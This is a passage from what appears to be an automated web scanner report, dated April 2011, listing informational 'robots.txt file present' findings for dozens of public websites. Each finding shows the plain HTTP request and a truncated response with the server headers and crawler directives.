Disallow: /config/
Disallow: /bin/
Disallow: /camp/
Sitemap: http://www.hbo.com/sitemap.xml
Sitemap: http://www.hbo.com/backen
...[SNIP]...

24.383. http://www.health.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.health.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.health.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 22:19:48 GMT
ETag: "517-29db8900"
Accept-Ranges: bytes
Content-Length: 1303
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...

24.384. http://www.healthcare.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcare.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthcare.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:54 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 15 Jul 2009 16:04:25 GMT
ETag: "1174490-1719-46ec0b584d440"
Accept-Ranges: bytes
Content-Length: 5913
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.healthcare.com/sitemap.xml

User-agent:HealthCareCrawl
Disallow:/tag/
Disallow:/care-providers-directory/
Disallow:/search/
Disallow:/profile/
Disallow:/find/
Disallow:/pop
...[SNIP]...

24.385. http://www.healthcentral.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthcentral.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR CONi OUR DELi SAMi OTRi STP STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Accept-Ranges: bytes
Last-Modified: Tue, 01 Mar 2011 21:19:28 GMT
ETag: "1CBD85658DF3000:1CBF13BFE6133FE"
Content-Type: text/plain
Content-Length: 1057
Expires: Sat, 02 Apr 2011 13:43:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:43:57 GMT
Connection: close
Set-Cookie: THCN=r4172361686; path=/; expires=Fri, 1 Jan 2010 01:01:50 GMT

User-agent: *
Sitemap: http://www.healthcentral.com/hc_sitemap.xml
Sitemap: http://www.healthcentral.com/common/h/sitemaps/google_index.xml
Sitemap: http://www.healthcentral.com/profiles/c/sitemaps
...[SNIP]...

24.386. http://www.healthgrades.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthgrades.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthgrades.com

Response

HTTP/1.1 200 OK
Content-Length: 1704
Content-Type: text/plain
Last-Modified: Thu, 04 Mar 2010 23:24:02 GMT
Accept-Ranges: bytes
ETag: "a561c6c6f1bbca1:19f2"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml",CP="NON DSP COR PSDa OUR NOR UNI"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:13 GMT
Connection: close
Set-Cookie: BIGipServerHealthgrades=1846280202.20480.0000; path=/
Vary: Accept-Encoding

User-agent: *
Disallow: /ContentLic/
Disallow: /Contentlic/
Disallow: /contentlic/
Disallow: /Consumer/
Disallow: /consumer/
Disallow: /Employers/
Disallow: /employers/
Disallow: /Videos/
Dis
...[SNIP]...

24.387. http://www.healthline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthline.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: private, max-age=0, no-cache, no-store
Expires: -1
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:44 GMT
Content-Length: 6982
Connection: close
Set-Cookie: dbsid=3b6618ee-36ee-4559-8276-5dac60329d24; Path=/
Set-Cookie: pv=1; Expires=Mon, 02-May-2011 13:41:44 GMT; Path=/

User-agent: Googlebot
Disallow: /search?q1=
Disallow: /Email%20this%20article%20to%20a%20friend
Disallow: /Print%20this%20article
Disallow: /Save%20this%20article
Disallow: /Tell%20a%20friend
Disallow
...[SNIP]...

24.388. http://www.helium.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.helium.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.helium.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:28 GMT
Last-Modified: Wed, 16 Feb 2011 21:43:28 GMT
Content-Type: text/plain
Content-Length: 371
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.helium.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Connection: close

# See http://www.robotstxt.org/wc/norobots.html [^] for documentation on how to use the robots.txt file

User-agent: *
Disallow: /rss/
Disallow: /login
Disallow: /registration/
Disallow: /show_r
...[SNIP]...

24.389. http://www.hgtv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hgtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hgtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 24 Dec 2008 20:39:42 GMT
Accept-Ranges: bytes
Content-Length: 537
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:45:25 GMT
Connection: close

###############################
#
# hgtv.com robots.txt file
#
# addresses all robots by using wild card *

User-agent: *


# list folders robots are not allowed to index

Disallow: /cr/
Disallow
...[SNIP]...

24.390. http://www.hhs.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hhs.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hhs.gov

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/plain; charset=UTF-8
Last-Modified: Tue, 13 Jul 2010 14:12:26 GMT
Content-Length: 479
ETag: "1df-4c3c744a"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 14:20:09 GMT
Connection: close

# robots.txt for http://www.hhs.gov
# robots.txt for http://www.os.dhhs.gov
# robots.txt for http://www.dhhs.gov
# robots.txt for http://os.dhhs.gov:80

user-agent: * # directed to all spiders, not j
...[SNIP]...

24.391. http://www.hi5.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hi5.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hi5.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"216-1275608514000"
Last-Modified: Thu, 03 Jun 2010 23:41:54 GMT
Content-Type: text/plain
Content-Length: 216
Date: Sat, 02 Apr 2011 13:34:03 GMT
Connection: keep-alive
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246b3293660;expires=Sat, 02-Apr-11 14:16:48 GMT;path=/

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /friend/message/displayMessageCenter.do
Disallow: /friend/viewFriends.do
Disallow: /friend/displayLogin.do
Disallow: /friend
...[SNIP]...

24.392. http://www.hiexpress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hiexpress.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hiexpress.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.6
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
ETag: "ClWWxhoQhlF"
Last-Modified: Tue, 29 Mar 2011 21:59:26 GMT
Accept-Ranges: bytes
Content-Length: 438
Expires: Sat, 02 Apr 2011 13:36:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:17 GMT
Connection: close
Set-Cookie: TLTSID=2FDED8C45D2E105D0107D50ADC66F426; Path=/; Domain=.hiexpress.com
Set-Cookie: TLTUID=2FDED8C45D2E105D0107D50ADC66F426; Path=/; Domain=.hiexpress.com; expires=Sat, 02-04-2021 13:36:17 GMT
Set-Cookie: wwwcluster=one; domain=.hiexpress.com; path=/
Set-Cookie: datacenternode=us-md-vz; domain=.hiexpress.com; path=/
Set-Cookie: RJESSESSIONID=obrH7GJV30Wl19H3ABw8s; domain=hiexpress.com; path=/

# robots.txt for http://www.hiexpress.com/

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: NaverBot-1.0
Disallow: /

User-agent: NaverBot
Disallow: /

User-agent: Mizzu Labs 2.2
Dis
...[SNIP]...

24.393. http://www.hilton.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hilton.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hilton.com

Response

HTTP/1.0 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/plain
ETag: "0-0-0-63cc"
Last-Modified: Thu, 28 Jan 2010 20:51:29 GMT
Cache-Control: private
Date: Sat, 02 Apr 2011 13:37:50 GMT
Content-Length: 25548
Connection: close

# Daytime instructions for search engines
# Do not visit Hilton.com during the day!
User-agent: Googlebot
Disallow: /guestlocale/
Disallow: /en/hhonors/login/owner_login.jhtml
Disallow: /en/hi/groups/
...[SNIP]...

24.394. http://www.history.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.history.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.history.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix)
Last-Modified: Mon, 21 Mar 2011 16:37:50 GMT
ETag: "172092a-1c9-49f00bf96f380"
Accept-Ranges: bytes
Content-Length: 457
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:44:48 GMT
Connection: close

User-agent: *

# Block Ajax snippets from indexing.
Disallow: /ajax/
Disallow: /flash/
Disallow: /global/
Disallow: /xml/
Disallow: /images/media
Disallow: /bcplayers
Disallow: /imgs/decoration/
Disal
...[SNIP]...

24.395. http://www.holidayinn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.holidayinn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.holidayinn.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.6
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
ETag: "F6OrH5gL6rf"
Last-Modified: Tue, 29 Mar 2011 21:59:26 GMT
Accept-Ranges: bytes
Content-Length: 380
Expires: Sat, 02 Apr 2011 13:33:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:20 GMT
Connection: close
Set-Cookie: TLTSID=C64E3F805D2D105D0040B3F0BEBF8E6E; Path=/; Domain=.holidayinn.com
Set-Cookie: TLTUID=C64E3F805D2D105D0040B3F0BEBF8E6E; Path=/; Domain=.holidayinn.com; expires=Sat, 02-04-2021 13:33:20 GMT
Set-Cookie: wwwcluster=one; domain=.holidayinn.com; path=/
Set-Cookie: datacenternode=us-md-vz; domain=.holidayinn.com; path=/
Set-Cookie: RJESSESSIONID=jnpjekFFIDbUS9VJVAw8s; domain=holidayinn.com; path=/

# robots.txt for http://www.holidayinn.com/

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: NaverBot-1.0
Disallow: /

User-agent: NaverBot
Disallow: /

User-agent: Mizzu Labs 2.2
Di
...[SNIP]...

24.396. http://www.hollywood.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hollywood.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hollywood.com

Response

HTTP/1.1 200 OK
Content-Length: 3344
Content-Type: text/plain
Last-Modified: Wed, 24 Mar 2010 20:59:41 GMT
Accept-Ranges: bytes
ETag: "553e92ec94cbca1:c31"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:32:56 GMT
Connection: close

# /robots.txt file for http://www.hollywood.com/

# ---------------------------------------------------------------------
# Crawl-Delay
#
User-agent: *
Crawl-delay: 10

User-agent: Slurp
Craw
...[SNIP]...

24.397. http://www.hollywoodlife.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hollywoodlife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hollywoodlife.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Server: nginx/0.7.62
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Content-Length: 243
Date: Sat, 02 Apr 2011 13:54:08 GMT
Connection: close

User-agent: *
Disallow: /print-post/
Disallow: /wp-admin/
   
User-agent: Googlebot-Mobile
Disallow: /
       
Sitemap: http://www-hollywoodlife-com.vimg.net/sitemap.xml
Sitemap: http://www-hollywood
...[SNIP]...

24.398. http://www.hollywoodreporter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hollywoodreporter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hollywoodreporter.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/plain; charset=UTF-8
X-Powered-By: PHP/5.3.5
Date: Sat, 02 Apr 2011 13:44:55 GMT
Content-Length: 1572
Connection: close

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.399. http://www.home-remedies-for-you.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.home-remedies-for-you.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.home-remedies-for-you.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:20:07 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 08 Jun 2009 06:44:17 GMT
ETag: "2a40038-42-46bd092329240"
Accept-Ranges: bytes
Content-Length: 66
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: */blog/page*
Disallow: */addanswer.html

24.400. http://www.homedepot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homedepot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homedepot.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Fri, 26 Nov 2010 21:06:16 GMT
ETag: "1029-538-17d4e200"
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:24:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:24:42 GMT
Content-Length: 1336
Connection: close
Set-Cookie: Coradiantuserid=288df00d-9eee-1ce7-9678-00e0ed0ed026
Set-Cookie: NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991;path=/;httponly

# robots.txt for http://www.homedepot.com/
User-agent: *
Disallow: /*SiteMapView*
Disallow: /*Navigation?Ns=P_Topseller_Sort|style=List*
Disallow: /*Navigation?Ns=P_Topseller_Sort|style=A*
Disallow: /
...[SNIP]...

24.401. http://www.homegain.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homegain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homegain.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Thu, 02 Sep 2010 17:58:24 GMT
ETag: "118c88a-3a3-48f4a8f74f000"
Accept-Ranges: bytes
Content-Length: 931
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI COM NAV INT STA PRE"
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /goto
Disallow: /go_offsite
Sitemap: http://www.homegain.com/sitemap.xml
Sitemap: http://www.homegain.com/homegain_listings_sitemap_index.xml
Sitemap: http://www.homegain.com/p
...[SNIP]...

24.402. http://www.homes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homes.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:52 GMT
Last-Modified: Tue, 01 Mar 2011 13:51:21 GMT
ETag: "4dd37-107-49d6c175f6840"
Accept-Ranges: bytes
Content-Length: 263
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# /robots.txt file for http://www.homes.com
# e-mail web@homes.com for issues

User-agent: *
Disallow: /Include/
Disallow: /Utilities/
Disallow: /Content/OfficeDetail.cfm
Disallow: /HomesCom/In
...[SNIP]...

24.403. http://www.homestead.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homestead.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homestead.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:34:02 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 04 Feb 2011 17:43:20 GMT
ETag: "0ac3393c4cb1:7"
Content-Length: 625

# Block a bot that was causing issues by ignoring Disallow lines below
User-Agent: OmniExplorer_Bot
Disallow: /

# Block hotlinking of music files by projectplaylist.com due to perceived user band
...[SNIP]...

24.404. http://www.hometownlocator.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hometownlocator.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hometownlocator.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/plain
Last-Modified: Tue, 19 Feb 2008 17:05:50 GMT
Accept-Ranges: bytes
ETag: "3224cbad1973c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:59 GMT
Connection: close
Content-Length: 208

User-agent: *
Disallow: /City-Tools/
Disallow: /County-Tools/
Disallow: /State-Tools/
Disallow: /ZIP-Code-Tools/
Disallow: /includes/
Disallow: /utilities/
Disallow: /cgi-bin/
Disallow: /HTLAd
...[SNIP]...

24.405. http://www.hotels.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotels.com

Response

HTTP/1.0 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Tue, 15 Mar 2011 00:00:00 GMT
Cteonnt-Length: 5472
Expect:
Content-Type: text/plain;charset=ISO-8859-1
Cache-Control: private, max-age=0
Expires: Sat, 02 Apr 2011 13:38:59 GMT
Date: Sat, 02 Apr 2011 13:38:59 GMT
Content-Length: 5472
Connection: close


User-agent: Mediapartners-Google*
Disallow: *.pdf$
Disallow: /SeoSearchMap*
Disallow: /hotel/email_details.html*
Disallow: /search*
Disallow: /fullEnglishDesc.do*
Disallow: /checkavailability.do
Disa
...[SNIP]...

24.406. http://www.hotfrog.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotfrog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotfrog.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 01 Feb 2011 01:19:08 GMT
Accept-Ranges: bytes
ETag: "04ea6aec1cb1:40539"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:45 GMT
Connection: close

User-agent: *
Disallow:

24.407. http://www.hotwire.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotwire.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"716-1300925725000"
Last-Modified: Thu, 24 Mar 2011 00:15:25 GMT
Content-Type: text/plain
Content-Length: 716
Date: Sat, 02 Apr 2011 13:37:51 GMT
Connection: keep-alive
Set-Cookie: NSC_qspe-xxx-qfstjtu=ffffffffaf131c2545525d5f4f58455e445a4a422d6b;path=/;httponly

#Sitemap Pointer
Sitemap: http://www.hotwire.com/sitemap.xml

#Allow all robots to crawl based on following directives
User-Agent: *

#Disallow any URL with query string parameters
Disallow: /*?

#Dis
...[SNIP]...

24.408. http://www.house.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.house.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.house.gov

Response

HTTP/1.0 200 OK
Server: USHR Webserver Ver 5.4.1
Content-Type: text/plain
Last-Modified: Fri, 18 May 2001 17:31:43 GMT
Content-Length: 349
ETag: "15d-3b055c7f"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:34:41 GMT
Connection: close

#
# No robots allowed in the following directories !
#
User-agent: *
Disallow: /htbin
Disallow: /docs/ARCHIVE
Disallow: /docs/apps
Disallow: /docs/moved_sites
Disallow: /docs/temp
Disallow: /docs/te
...[SNIP]...

24.409. http://www.howstuffworks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howstuffworks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howstuffworks.com

Response

HTTP/1.0 200 OK
Server: ATS/2.1.6-unstable
Last-Modified: Sat, 02 Apr 2011 13:00:02 GMT
P3P: CP="ALL DSP COR CUR ADMo DEVo TAIo PSAo PSDo IVAo CONi OTPi OUR NOR UNI"
_ontent-Length: 876
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:23:54 GMT
Content-Length: 876
Connection: close
Set-Cookie: target=us; path=/; domain=.howstuffworks.com
Expires: Sat, 02 Apr 2011 14:00:00 GMT

User-agent: *
Disallow: /search.php
Disallow: /search2.php
Disallow: /suggest-vote.php
Disallow: /suggest-moreinfo.htm
Disallow: /suggest-comment.htm
Disallow: /suggest-vote.php
Disallow: /sugg
...[SNIP]...

24.410. http://www.howtodothings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howtodothings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howtodothings.com

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/plain
Last-Modified: Fri, 04 Feb 2011 14:46:59 GMT
Cache-Control: max-age=1209600
Expires: Wed, 13 Apr 2011 19:58:53 GMT
Vary: Accept-Encoding
X-AH-Environment: prod
Content-Length: 1885
Date: Sat, 02 Apr 2011 13:45:46 GMT
X-Varnish: 199372703 196147193
Age: 236813
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 865

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.411. http://www.hp.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hp.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:36 GMT
Server: Apache
Last-Modified: Tue, 15 Feb 2011 23:06:37 GMT
ETag: "3761f940"
Accept-Ranges: bytes
Content-Length: 454
Cache-Control: max-age=7200
Expires: Sat, 02 Apr 2011 14:43:36 GMT
Connection: close
Content-Type: text/plain

#$Header: robots.txt,v 1.19 2009/10/19 16:47:17 autreja Exp $ $Locker: $

# robots.txt file for www.hp.com
# send e-mail to hp<dot>comOperations<at>hp<dot>com for updates or problems

User-agent
...[SNIP]...

24.412. http://www.hsbccreditcard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsbccreditcard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hsbccreditcard.com

Response

HTTP/1.1 200 OK
Server: ""
Date: Sat, 02 Apr 2011 13:36:22 GMT
Content-length: 16427
Content-type: text/plain
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301751382.141234; path=/; expires=Tue, 30-Mar-2021 13:36:22 GMT
P3p: CP="CAO COR ADM DEVa TAIa PSA PSD IVAa IVDa CONa HIS OUR LEG CNT"
Expires: Sat, 02 Apr 2011 14:06:22 GMT
Last-modified: Fri, 19 Feb 2010 11:33:44 GMT
Surrogate-control: no-store
Content-language: en
Set-cookie: LASCCSSA2001US_ID=0000s5nFkorH5fueJ-9EtNPQdN2:15nj8arcb; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close

# mapping for web robots
# Added Allow, disallows & Sitemap directives as per SEO requirements for Aug 09 release.
User-agent: *
# ----------------------Allows Start -------------------------------
...[SNIP]...

24.413. http://www.hsn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hsn.com

Response

HTTP/1.1 200 OK
Content-Length: 462
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 15:23:10 GMT
Accept-Ranges: bytes
ETag: "0c3ad376ee9cb1:e66"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=A12047614762F0DB751F22BA5526B7C8; domain=.hsn.com; path=/
Set-Cookie: TLTHID=A12047614762F0DB751F22BA5526B7C8; domain=.hsn.com; path=/
Date: Sat, 02 Apr 2011 13:35:57 GMT
Connection: close

#Disallow all web-bots from searching the site
User-agent: *
Disallow: /cmr/
Disallow: /cnt/prod/moreinfo/
Disallow: /code/
Disallow: /css/
Disallow: /cust/
Disallow: /error/
Disallow: /Fc/
D
...[SNIP]...

24.414. http://www.hud.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hud.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hud.gov

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:53:57 GMT
Content-length: 1593
Content-type: text/plain
Last-modified: Mon, 10 Nov 2008 17:06:36 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /_notes/
Disallow: /apps/
Disallow: /bandwidth/
Disallow: /CFIDE/
Disallow: /cfmail/
Disallow: /cwg/
Disallow: /emergency/
Disallow: /emarc/
Disallow: /event_registrat
...[SNIP]...

24.415. http://www.huffingtonpost.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Fri, 21 May 2010 12:59:43 GMT
ETag: "610acec-b5-4871a43c92dc0"
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 12:37:46 GMT
Content-Length: 181
Connection: close

# All robots will spider the domain
User-agent: *
Disallow:

User-agent: *
Disallow: /backstage/

User-agent: *
Disallow: /blackberry/

User-agent: *
Disallow: /users/becomeFan.php

24.416. http://www.hulu.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
